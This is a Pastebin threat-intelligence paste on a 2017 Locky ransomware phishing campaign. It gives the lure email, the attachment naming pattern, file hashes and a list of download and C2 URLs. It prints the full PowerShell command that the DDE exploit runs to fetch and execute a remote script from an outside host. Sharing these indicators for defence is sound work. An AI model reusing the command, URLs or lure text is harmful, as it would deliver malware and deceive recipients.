SHARE
TWEET

2017-10-24 Locky "Your Invoice xxxxxx"

Racco42 Oct 24th, 2017 471 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 2017-10-24: #locky email phishing campaign "Your Invoice xxxxxx"
  2.  
  3. Email sample:
  4. ----------------------------------------------------------------------------------------------------------------
  5. From: "Anna" <Anna.Priestman@iscil.org>
  6. Date: Tue, 24 Oct 2017 17:23:04 +0700
  7. Subject: Your Invoice 99707
  8.  
  9. Your Invoice is attached. =20
  10.  
  11. If you feel you have received this email in error, please reply to this email to inform us of any necessary corrections.
  12.  
  13. Invoice: Invoice_file_54654.doc
  14. ----------------------------------------------------------------------------------------------------------------
  15. - email does not have To: header
  16. - subject is "Your Invoice <5-6 digits>"
  17. - attached file "Invoice_file_<5-6 digits>.doc" is a MS Word file containing a DDE exploit which will execute the following command:
  18.  
  19. C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' http://transmercasa.com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"
  20.  
  21. The command will try to download additional powershell script from one of the following locations:
  22. http://transmercasa.com/JHGGsdsw6
  23. http://urcho.com/JHGGsdsw6
  24.  
  25. This powershell script will download the malware loader from one of:
  26. http://tatianadecastelbajac.fr/kjhgFG
  27. http://video.rb-webdev.de/kjhgFG
  28. http://themclarenfamily.com/kjhgFG
  29.  
  30. Malware loader:
  31. - SHA256: 6106d1b5963feb632eee28aaee5b68e85aef1d090c5e5ef2899b3a0f1a3f7c5b, MD5: eae849f6510db451f4fbdb780b5d49aa
  32. - VT: https://www.virustotal.com/en/file/6106d1b5963feb632eee28aaee5b68e85aef1d090c5e5ef2899b3a0f1a3f7c5b/analysis/1508841473/
  33. - HA (doc file): https://www.reverse.it/sample/ea77730c72da80c9f375b8474ff73af189429a0d1e4b92c6af7341391f73edae?environmentId=100
  34. - loader will checkin via POST request to http://gdiscoun.org
  35. - loader will download encoded malware from http://webhotell.enivest.no/cuYT39.enc
  36.  
  37. Malware:
  38. - locky, .asasin variant
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top